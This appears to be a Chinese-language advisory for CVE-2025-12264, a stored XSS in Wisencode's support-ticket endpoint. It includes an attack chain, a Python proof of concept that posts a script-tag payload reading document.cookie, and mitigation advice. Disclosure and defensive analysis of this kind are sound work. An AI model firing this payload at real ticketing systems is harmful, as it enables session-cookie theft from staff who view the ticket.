CVE-2025-12264 Wisencode Create Support Ticket Handler XSS漏洞

漏洞信息

漏洞编号

CVE-2025-12264

漏洞类型

跨站脚本(XSS)

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Wisencode

漏洞概述

CVE-2025-12264是Wisencode软件中的一个存储型跨站脚本(XSS)漏洞。该漏洞存在于支持工单创建功能的Create Support Ticket Handler组件中，具体位于/support-ticket/create端点。攻击者可以通过在Message参数中注入恶意JavaScript代码，当其他用户查看该工单时，恶意脚本将在其浏览器上下文中执行。由于该漏洞需要低权限用户交互才能触发，攻击者需要诱骗受害者查看包含恶意内容的工单。此漏洞的CVSS评分为3.5，属于低危级别，主要影响数据完整性而非机密性或系统可用性。供应商Wisencode在接到早期披露通知后未做出任何回应，导致该漏洞在20251012版本前持续存在。

技术细节

该漏洞为存储型XSS（Stored XSS）漏洞，存在于Wisencode的支持工单创建功能中。攻击流程如下：1）攻击者通过API或Web界面访问/support-ticket/create端点；2）在Message参数中注入恶意JavaScript代码，如<script>alert(document.cookie)</script>；3）由于输入验证不足，系统将恶意脚本存储在数据库中；4）当其他用户（如管理员或客服人员）查看该工单时，恶意脚本在其浏览器中执行。由于攻击者需要具备基本的工单创建权限（低权限要求），且需要诱导受害者查看工单内容（需要用户交互），实际利用难度中等。漏洞的根本原因在于服务器端对用户输入的Message参数缺乏充分的HTML转义或内容安全策略(CSP)限制。

攻击链分析

STEP 1

步骤1

攻击者获取Wisencode系统的低权限账户（如普通用户账号）

STEP 2

步骤2

攻击者构造恶意XSS payload：<script>alert(document.cookie)</script>

STEP 3

步骤3

通过POST请求向/support-ticket/create端点提交工单，Message参数注入XSS代码

STEP 4

步骤4

系统未对Message参数进行充分过滤，将恶意脚本存储在数据库中

STEP 5

步骤5

受害者（客服或管理员）登录系统并查看该支持工单

STEP 6

步骤6

恶意JavaScript代码在受害者浏览器中执行，窃取会话Cookie或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# CVE-2025-12264 XSS PoC
# Target: Wisencode /support-ticket/create endpoint

TARGET_URL = "http://target-server.com/support-ticket/create"

# Malicious XSS payload
xss_payload = "<script>alert(document.cookie)</script>"

def create_malicious_ticket():
    """Create a support ticket with XSS payload in Message field"""
    headers = {
        "Content-Type": "application/json",
        "Authorization": "Bearer <low_privilege_token>"
    }
    
    data = {
        "subject": "Test Ticket",
        "message": xss_payload,
        "priority": "low"
    }
    
    try:
        response = requests.post(TARGET_URL, json=data, headers=headers)
        if response.status_code == 200:
            print("[+] Malicious ticket created successfully")
            return True
        else:
            print(f"[-] Failed to create ticket: {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

if __name__ == "__main__":
    print("CVE-2025-12264 XSS PoC")
    print("Target: Wisencode Support Ticket Handler")
    create_malicious_ticket()

影响范围

Wisencoder < 20251012

防御指南

临时缓解措施

在修复前，可通过禁用支持工单功能或限制普通用户创建工单的权限来临时缓解风险。同时监控相关端点的访问日志，及时发现异常的XSS攻击尝试。对于必须保留的功能，建议在Web应用前端增加额外的输入过滤规则，对<script>等危险标签进行拦截。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-12264
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-12264
3 Details https://www.cvedetails.com/cve/CVE-2025-12264/
4 VulDB https://vuldb.com/cve/CVE-2025-12264
5 Link https://vuldb.com/?ctiid.329935
6 Link https://vuldb.com/?id.329935
7 Link https://vuldb.com/?submit.673806